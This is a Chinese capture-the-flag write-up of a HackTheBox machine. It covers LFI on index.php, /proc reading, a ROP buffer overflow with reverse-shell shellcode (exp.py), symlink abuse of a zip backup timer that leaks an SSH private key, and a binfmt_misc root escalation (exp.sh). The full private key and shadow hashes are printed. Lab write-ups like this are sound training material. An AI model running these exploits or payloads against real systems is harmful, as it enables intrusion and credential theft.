基本信息

端口扫描

22和80:

$ nmap -sC -sV 10.10.11.154
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 12:53 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.154
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 77:b2:16:57:c2:3c:10:bf:20:f1:62:76:ea:81:e4:69 (RSA)
| 256 cb:09:2a:1b:b9:b9:65:75:94:9d:dd:ba:11:28:5b:d2 (ECDSA)
|_ 256 0d:40:f0:f5:a8:4b:63:29:ae:08:a1:66:c1:26:cd:6b (ED25519)
80/tcp open http nginx
| http-title: Agency - Start Bootstrap Theme
|_Requested resource was /index.php?page=default.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.14 seconds

80

访问自动跳转首页,page参数加载页面,很可能存在LFI:

目录扫描

目录扫描可以发现一个beta.html,存在上传功能:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://10.10.11.154/  -x html,php,txt

/assets (Status: 301) [Size: 162] [--> http://10.10.11.154/assets/]
/beta.html (Status: 200) [Size: 4144]
/css (Status: 301) [Size: 162] [--> http://10.10.11.154/css/]
/default.html (Status: 200) [Size: 11414]
/index.php (Status: 302) [Size: 0] [--> /index.php?page=default.html]
/index.php (Status: 302) [Size: 0] [--> /index.php?page=default.html]
/js (Status: 301) [Size: 162] [--> http://10.10.11.154/js/]

beta.html

upload

尝试上传文件,发现activate_license.php:

LFI

验证LFI确实存在;由于浏览器访问会跳转到首页,所以通过repeater或者直接使用curl:

activate_license.php

LFI读前面的activate_license.php,发现本地1337端口的服务:

/proc/sched_debug

因为监听1337端口的是另一个进程,所以先通过/proc/sched_debug获取进程信息:

/proc/pid/cmdline

然后根据pid再去获取其他信息,得到文件路径:

activate_license1337

下载下来分析,接下来就是二进制部分了

curl "http://10.10.11.154/index.php?page=/usr/bin/activate_license" --output activate_license

$ file activate_license
activate_license: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=554631debe5b40be0f96cabea315eedd2439fb81, for GNU/Linux 3.2.0, with debug_info, not stripped

checksec activate_license
[*] activate_license
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled

rop

基础ROP:绕过各种保护所需的地址信息可以通过LFI读取/proc/<pid>/maps获得,最终拿到www-data权限:

offset 520

maps

559bc36a6000-559bc36a7000 r--p 00000000 08:01 2408                       /usr/bin/activate_license
559bc36a7000-559bc36a8000 r-xp 00001000 08:01 2408 /usr/bin/activate_license
559bc36a8000-559bc36a9000 r--p 00002000 08:01 2408 /usr/bin/activate_license
559bc36a9000-559bc36aa000 r--p 00002000 08:01 2408 /usr/bin/activate_license
559bc36aa000-559bc36ab000 rw-p 00003000 08:01 2408 /usr/bin/activate_license
559bc3ba7000-559bc3bc8000 rw-p 00000000 00:00 0 [heap]
7f68d48b9000-7f68d48bb000 rw-p 00000000 00:00 0
7f68d48bb000-7f68d48bc000 r--p 00000000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48bc000-7f68d48be000 r-xp 00001000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48be000-7f68d48bf000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48bf000-7f68d48c0000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48c0000-7f68d48c1000 rw-p 00004000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48c1000-7f68d48c8000 r--p 00000000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48c8000-7f68d48d8000 r-xp 00007000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48d8000-7f68d48dd000 r--p 00017000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48dd000-7f68d48de000 r--p 0001b000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48de000-7f68d48df000 rw-p 0001c000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48df000-7f68d48e3000 rw-p 00000000 00:00 0
7f68d48e3000-7f68d48f2000 r--p 00000000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d48f2000-7f68d498c000 r-xp 0000f000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d498c000-7f68d4a25000 r--p 000a9000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a25000-7f68d4a26000 r--p 00141000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a26000-7f68d4a27000 rw-p 00142000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a27000-7f68d4a4c000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4a4c000-7f68d4b97000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4b97000-7f68d4be1000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be1000-7f68d4be2000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be2000-7f68d4be5000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be5000-7f68d4be8000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be8000-7f68d4bec000 rw-p 00000000 00:00 0
7f68d4bec000-7f68d4bfc000 r--p 00000000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4bfc000-7f68d4cf4000 r-xp 00010000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4cf4000-7f68d4d28000 r--p 00108000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d28000-7f68d4d2c000 r--p 0013b000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d2c000-7f68d4d2f000 rw-p 0013f000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d2f000-7f68d4d31000 rw-p 00000000 00:00 0
7f68d4d36000-7f68d4d37000 r--p 00000000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d37000-7f68d4d57000 r-xp 00001000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d57000-7f68d4d5f000 r--p 00021000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d60000-7f68d4d61000 r--p 00029000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d61000-7f68d4d62000 rw-p 0002a000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d62000-7f68d4d63000 rw-p 00000000 00:00 0
7ffdd5ef5000-7ffdd5f16000 rw-p 00000000 00:00 0 [stack]
7ffdd5f4b000-7ffdd5f4f000 r--p 00000000 00:00 0 [vvar]
7ffdd5f4f000-7ffdd5f51000 r-xp 00000000 00:00 0 [vdso]

exp.py

#!/usr/bin/python3
import requests
from pwn import *

def kill(sig, frame):
    """SIGINT handler: print the exit banner and stop the script with status 1.

    `sig` and `frame` are the standard signal-handler arguments; neither is
    used.  "Saliendo" is Spanish for "exiting".
    """
    banner = "\n[\033[1;31m-\033[1;37m] Saliendo\n"
    print(banner)
    # Equivalent to sys.exit(1): SystemExit propagates out of the handler.
    raise SystemExit(1)

# Route Ctrl-C through kill() so an interrupted run prints the banner and exits.
signal.signal(signal.SIGINT, kill)

# Listener address for the connect-back: the IP is asked interactively,
# the port is fixed to 443 (kept as a string, converted where it is used).
inip = input("\n[\033[1;34m*\033[1;37m] Introduce tu ip (tun0): ")
inport = "443"

def file(path):
    """Fetch `path` from the target through the LFI in index.php's `page`
    parameter, store it under /tmp and return the local path.

    `allow_redirects=False` keeps the raw response instead of following the
    redirect to the home page that a browser would see.
    """
    request = requests.get(f"http://10.10.11.154/index.php?page={path}", allow_redirects=False)
    # NOTE(review): /tmp/<basename> is a predictable name that is silently
    # overwritten; a collision with an existing file there corrupts the copy.
    rpath = f"/tmp/{path.split('/')[-1]}"
    with open(rpath,"wb") as f:
        f.write(request.content)
    return rpath

def rpid():
    """Return the PID (as a string) of the activate_license process.

    /proc/sched_debug lists running tasks with their comm name and PID and
    is evidently readable by the web server's user here, which is why the
    LFI can expose it.  The comm field is truncated, hence the pattern
    matches "activate_licens" rather than the full name.
    """
    request = requests.get(f"http://10.10.11.154/index.php?page=/proc/sched_debug", allow_redirects=False)
    # NOTE(review): "\s" in a non-raw string is an invalid escape sequence
    # (DeprecationWarning); r"..." is the intended spelling.  .group(1) raises
    # AttributeError when the process is not listed.
    pid = re.search("activate_licens\s+([0-9]+)",request.text).group(1)
    return pid

def adrs(pid):
    """Parse /proc/<pid>/maps of the target process (read through the LFI)
    and return (libc_base, libc_path, libsqlite_base, libsqlite_path,
    stack_start, stack_end).

    Each base is the start address of the first mapping line naming the
    library; each path is the last whitespace-separated token of that line.
    Every re.search(...).group(...) raises AttributeError when the pattern
    is absent (for example an empty response body).
    """
    r = requests.get(f"http://10.10.11.154/index.php?page=/proc/{pid}/maps", allow_redirects=False)
    # A maps line is "start-end perms offset dev inode path"; the hex before
    # '-' is the mapping start, int(..., 16) converts it.
    libcb = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16)
    libcp = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1]
    libsb = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16)
    libsp = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1]
    # NOTE(review): "\[stack\]" is a non-raw string; the backslashes happen to
    # survive, but r"..." would be the safer spelling.
    sbase = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16)
    # End address: the hex after '-' up to the first space.
    ssend = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16)
    return libcb, libcp,libsb, libsp, sbase, ssend

def bof():
    """Build the overflow for activate_license and deliver it through the
    licensefile upload of activate_license.php.

    Layout: 520 filler bytes (the offset found earlier in the writeup), a
    ROP chain calling libc mprotect(stack_start, stack_size, 7) so the stack
    becomes executable again, then a jmp rsp gadget into the connect-back
    shellcode.  It works because the binary has NX but no stack canary (see
    the checksec output) and its PIE/library bases are leaked through the
    LFI-readable /proc files — closing the LFI removes the leak, and bounds
    checking the license input removes the overflow.  Reads the module
    globals inip and inport.
    """
    # Connect-back address and port, packed in network byte order and spliced
    # into the shellcode below.
    ip = socket.inet_aton(inip)
    port = port=struct.pack(">H",int(inport))

    # x86-64 shellcode: socket, connect to ip:port, dup2 the socket onto
    # fds 0-2, then execve("/bin/sh").
    payload = b""
    payload += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48"
    payload += b"\x97\x48\xb9\x02\x00" + port + ip + b"\x51\x48"
    payload += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e"
    payload += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58"
    payload += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48"
    payload += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"

    # Locate the service process and read its memory layout via the LFI.
    pid = rpid()

    libcb, libcp, libsb, libsp, sbase, ssend = adrs(pid)

    ssize = ssend - sbase

    # Download the exact libc and libsqlite3 copies from the target so the
    # gadget and symbol offsets match, then rebase them to the leaked addresses.
    context.clear(arch='amd64')
    libc = ELF(file(libcp),checksec=False)
    libc.address = libcb
    libsql = ELF(file(libsp),checksec=False)
    libsql.address = libsb
    rop = ROP([libc, libsql])

    offset = 520

    prt = libc.symbols['mprotect']
    rdi = rop.rdi[0]
    rsi = rop.rsi[0]
    rdx = rop.rdx[0]
    rsp = rop.jmp_rsp[0]

    exploit = b'A' * offset

    # mprotect(sbase, ssize, 7): 7 = PROT_READ|PROT_WRITE|PROT_EXEC.
    exploit += p64(rdi) + p64(sbase)
    exploit += p64(rsi) + p64(ssize)
    exploit += p64(rdx) + p64(7)
    exploit += p64(prt)
    # After mprotect returns, rsp points just past the chain, i.e. at payload.
    exploit += p64(rsp)
    exploit += payload

    # The PHP page forwards the uploaded "license" to the local 1337 service.
    requests.post(f"http://10.10.11.154/activate_license.php", files = { "licensefile": exploit } )

# bof() runs in a background thread; the main thread opens the listener on
# 443 (the port hard-coded in inport) and waits up to 60 s for the
# connect-back.  NOTE(review): the thread starts before listen() is called,
# so this relies on bof()'s HTTP round-trips taking longer than socket setup.
threading.Thread(target=bof, args=()).start()
shell = listen(443, timeout=60).wait_for_connection()
# Give the remote shell a usable TERM and a writable HOME before going interactive.
shell.sendline(b"export TERM=xterm HOME=/var/www")
shell.interactive()

website_backup

枚举可以发现一个website_backup定时运行,其中调用的是/usr/bin/webbackup:

systemctl list-timers

Thu 2022-06-23 05:24:00 UTC 31s left Thu 2022-06-23 05:23:09 UTC 19s ago website_backup.timer website_backup.service

$ find / -name website_backup.service 2>/dev/null
/etc/systemd/system/website_backup.service

$ cat /etc/systemd/system/website_backup.service
[Unit]
Description=Backup and rotate website

[Service]
User=dev
Group=www-data
ExecStart=/usr/bin/webbackup

[Install]
WantedBy=multi-user.target

/usr/bin/webbackup

继续检查这个脚本,发现它以dev用户身份调用zip压缩/var/www/html,而zip默认会跟随软链接,所以我们可以在html目录下创建软链接,让它把我们想要读取的文件一并打包:

$ cat /usr/bin/webbackup
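#!/bin/bash
# Back up /var/www/html into a timestamped zip under /var/www and keep the
# ten newest archives.  Started by website_backup.service as user "dev"
# (group www-data), so every file it reads is read with dev's privileges.
set -euf -o pipefail

cd /var/www/

SRC=/var/www/html
DST="/var/www/$(date +%Y-%m-%d_%H-%M-%S)-html.zip"

/usr/bin/rm --force -- "$DST"
# --symlinks stores symbolic links as links instead of following them.
# Without it zip opens each link target with this service's privileges, so a
# link planted in the www-data-writable html tree by a less privileged user
# ends up with the target's contents inside an archive that user can read.
/usr/bin/zip --recurse-paths --symlinks "$DST" "$SRC"

# Rotation: archives sort by name (which starts with the timestamp); the
# newest KEEP are kept, everything after them is deleted.  KEEP is decremented
# inside the pipeline's subshell, which is fine since it is not used afterwards.
KEEP=10
/usr/bin/find /var/www/ -maxdepth 1 -name '*.zip' -print0 \
  | sort --zero-terminated --numeric-sort --reverse \
  | while IFS= read -r -d '' backup; do
      if [ "$KEEP" -le 0 ]; then
        /usr/bin/rm --force -- "$backup"
      fi
      KEEP="$((KEEP-1))"
    done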

软链接

所以就是创建一个软链接,等待执行后去解压生成的zip文件,获取对应文件

$ cd /var/www/html
$ ln -s /home/dev/.ssh/id_rsa id_rsa

$ cp /var/www/2022-06-23_05-50-09-html.zip /tmp
$ cd /tmp
$ unzip 2022-06-23_05-50-09-html.zip

$ cat var/www/html/id_rsa

dev_id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
7rTyG3wbNka1sAAAALZGV2QHJldGlyZWQ=
-----END OPENSSH PRIVATE KEY-----

user flag

使用得到的私钥登录dev用户:

emuemu

emuemu目录里有两个二进制文件,并附带了源码:

在reg_helper中可以发现与binfmt_misc相关的代码:

搜索可以发现实际被调用的是/usr/lib/emuemu目录下的reg_helper,它和当前目录里的那份一致:

也可以发现binfmt_misc相关利用:

提权 & root flag

把上面的脚本中的部分代码改成当前环境的信息后运行,即可得到root:

  • 删除not_writeable因为我们没有对应的写权限
  • 最终的echo那里使用对应文件
# Original line of the public script: writes the format line straight into
# binfmt_misc's register file, which requires write access to it.
echo "$binfmt_line" > "$mountpoint"/register
# Replacement used on this box: hand the same line to reg_helper instead.
echo "$binfmt_line" | /usr/lib/emuemu/reg_helper

exp.sh

#!/bin/bash

# Constants for the run: the directory searched for a setuid binary, the
# binfmt_misc mount point, and this script's own name (shown by usage()).
declare -r searchsuid='/bin/'
declare -r mountpoint='/proc/sys/fs/binfmt_misc'
declare -r exe="$0"


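# Print the arguments to stderr as one line.  "$*" joins them with a single
# space and printf prints them verbatim, so word splitting, globbing and
# echo's option parsing (a message starting with "-n" or "-e") can no longer
# alter the text — the original `echo $@` was subject to all three.
warn()
{
  printf '%s\n' "$*" >&2
}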

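# Print the arguments via warn and terminate the script.  Arguments are passed
# through quoted so spaces and glob characters survive.  The original
# `exit -1` is folded by bash to status 255; the value is written out so the
# exit status is explicit.
die()
{
  warn "$@"
  exit 255
}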

# Print the usage banner on stderr and exit with status 1.  Reads the global
# $exe for the program name; invoked when the script receives any argument.
usage()
{
  {
    printf 'Usage: %s\n' "$exe"
    cat <<'EOF'
Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
note that it must be enforced by any other mean before your try this, for
example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave is
thinking that you are fixing his problem.
EOF
  } >&2
  exit 1
}

# Print the last setuid executable file found (recursively) under $1, or
# nothing when there is none.  "Last" is whatever find lists last.
pick_suid()
{
  local dir=$1
  find "$dir" -perm -4000 -executable | tail -n1
}

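# Print the first $2 bytes of file $1 with every NUL byte rewritten as the
# literal text "\x00" (the escaped form used in the binfmt_line built later in
# the script).  Prints nothing and returns 1 when $1 does not exist or $2 is
# not a plain decimal count.  The original pattern was unanchored, so a count
# such as "12x" passed the check and only failed inside dd; it is anchored now.
read_magic()
{
  local path=$1 count=$2
  [[ -e "$path" ]] || return 1
  [[ "$count" =~ ^[[:digit:]]+$ ]] || return 1
  dd if="$path" bs=1 count="$count" status=none \
    | sed -e 's-\x00-\\x00-g'
}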

# Any argument at all prints the usage text and exits.
[[ -n "$1" ]] && usage

# Pick a setuid binary; its leading bytes become the "magic" of a new
# binfmt_misc format, so that executing it dispatches to our interpreter.
target="$(pick_suid "$searchsuid")"
test -e "$target" || die "Error: Unable to find a suid binary in $searchsuid"

# 126 bytes of the target are used as the magic (presumably chosen to stay
# within the kernel's magic-length limit — confirm against the binfmt_misc docs).
binfmt_magic="$(read_magic "$target" "126")"
test -z "$binfmt_magic" && die "Error: Unable to retrieve a magic for $target"

# mktemp -u only generates a random 4-character name; the interpreter file
# itself is created by the second mktemp and compiled into below.
fmtname="$(mktemp -u XXXX)"
fmtinterpr="$(mktemp)"

# The interpreter: a small C program that deletes its own file, unregisters
# the format (writing -1 to its entry), reports uid/euid and execs /bin/sh.
# With the "C" (credentials) flag in binfmt_line the kernel runs it with the
# credentials of the setuid target, which is what lets setuid(0) succeed.
gcc -o "$fmtinterpr" -xc - <<- __EOF__
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <pwd.h>

int main(int argc, char *argv[])
{
// remove our temporary file
unlink("$fmtinterpr");

// remove the unused binary format
FILE* fmt = fopen("$mountpoint/$fmtname", "w");
fprintf(fmt, "-1\\n");
fclose(fmt);

// MOTD
setuid(0);
uid_t uid = getuid();
uid_t euid = geteuid();
struct passwd *pw = getpwuid(uid);
struct passwd *epw = getpwuid(euid);
fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\n",
uid,
pw->pw_name,
euid,
epw->pw_name);

// welcome home
char* sh[] = {"/bin/sh", (char*) 0};
execvp(sh[0], sh);
return 1;
}
__EOF__

chmod a+x "$fmtinterpr"

# Registration line: name, magic match ("M"), the escaped magic, the
# interpreter path and the flags "OC".  The register file is normally writable
# only by root; here the line is handed to /usr/lib/emuemu/reg_helper, which
# (per the writeup) performs the write on the caller's behalf.  That helper is
# the privilege boundary being crossed — it should not accept arbitrary
# format registrations from unprivileged users.
binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
echo "$binfmt_line" | /usr/lib/emuemu/reg_helper

# Executing the setuid target now matches the new format, so the kernel runs
# the interpreter above instead of the target itself.
exec "$target"

shadow

root:$y$j9T$WTPWClbhbDs7l.UxQ36u80$ARJoOe6zhfOEca5WFBXjo4fGaxCg1Iof6qTbrfn1CzA:19062:0:99999:7:::
dev:$6$kxjJ4ZicR62IY8ot$YKNoHWo9jQdRnNQ2f9dKX4IUI70ocRkClcIjUfoI/RF0.q6UeWLf2Jb8AfNyBHjJPxS0o5a7MhBR9g.eNfu8/.:18913:0:99999:7:::

参考资料